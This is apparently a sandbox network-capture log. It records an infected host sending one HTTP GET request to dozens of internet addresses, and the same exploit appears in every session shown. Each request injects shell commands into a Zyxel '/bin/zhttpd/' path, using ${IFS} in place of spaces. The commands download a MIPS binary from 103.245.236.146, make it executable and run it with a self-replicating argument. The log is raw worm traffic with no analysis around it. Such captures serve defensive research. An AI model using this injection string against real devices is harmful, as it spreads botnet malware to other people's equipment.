                                              Jan 29, 2024 07:03:02.553757906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              353192.168.2.14585568.196.34.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553823948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              354192.168.2.1437162116.159.48.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553855896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              355192.168.2.145832453.163.198.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553894997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              356192.168.2.1446940189.38.141.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553937912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              357192.168.2.143942614.113.5.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.553965092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              358192.168.2.1444670183.85.12.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554003000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              359192.168.2.1436720221.196.63.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554032087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              360192.168.2.1447728219.90.202.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554060936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              361192.168.2.145942838.114.187.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554143906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              362192.168.2.1444904171.200.222.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554143906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              363192.168.2.1442980163.196.113.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554203987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              364192.168.2.1448136199.36.193.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554260969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              365192.168.2.1434536148.140.205.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554277897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              366192.168.2.1448680140.155.82.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554301023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              367192.168.2.1460856216.26.26.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554322004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              368192.168.2.1435074170.112.113.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554375887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              369192.168.2.1437212223.120.14.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554413080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              370192.168.2.145370650.59.129.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554445028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              371192.168.2.1456824107.243.48.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554461956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              372192.168.2.143451699.117.213.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554549932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              373192.168.2.1457378151.148.221.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554558992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              374192.168.2.1459514190.235.98.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554584026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              375192.168.2.145995896.141.201.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554606915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              376192.168.2.145590620.57.195.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554668903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              377192.168.2.144667898.79.86.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554698944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              378192.168.2.1448526209.150.23.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554747105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              379192.168.2.1457090143.164.201.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554781914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              380192.168.2.143823236.71.87.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554831982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              381192.168.2.144117853.86.230.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554832935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              382192.168.2.1446710126.119.92.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554872990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              383192.168.2.1444516184.101.190.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554888964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              384192.168.2.1438604178.174.0.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554919958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              385192.168.2.1436238141.44.240.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554969072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              386192.168.2.144910224.17.144.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.554980993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              387192.168.2.1438684164.104.68.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555042028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              388192.168.2.144774848.51.15.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555084944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              389192.168.2.1433346170.116.213.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555180073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              390192.168.2.1440702132.141.163.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555183887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              391192.168.2.143360466.98.236.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555212021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              392192.168.2.1459204205.9.244.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555255890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              393192.168.2.1452222190.42.95.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555311918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              394192.168.2.144977690.78.33.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555347919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              395192.168.2.1445020148.124.235.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555372953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              396192.168.2.145375068.58.35.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555406094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              397192.168.2.144710619.104.57.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555459976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              398192.168.2.1452710134.160.52.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555494070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              399192.168.2.145066074.184.178.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555538893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              400192.168.2.1454948161.170.102.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555583954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              401192.168.2.1436508163.81.195.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555618048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              402192.168.2.1445022111.219.209.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555655003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              403192.168.2.143970619.181.247.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555701971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              404192.168.2.144713644.218.184.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555742025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              405192.168.2.144966227.152.20.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555780888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              406192.168.2.145470281.4.236.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555850029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              407192.168.2.1442430137.188.205.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555866003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              408192.168.2.144579057.44.68.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555888891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              409192.168.2.1449326124.107.14.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.555953979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              410192.168.2.14509101.202.40.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556003094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              411192.168.2.143499861.104.247.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556031942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              412192.168.2.143521037.154.29.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556080103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              413192.168.2.1439728192.133.87.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556138039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              414192.168.2.1452582109.67.118.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556157112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              415192.168.2.1460632203.177.196.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:02.556207895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              416192.168.2.1459432117.174.251.200443
                                              TimestampBytes transferredDirectionData
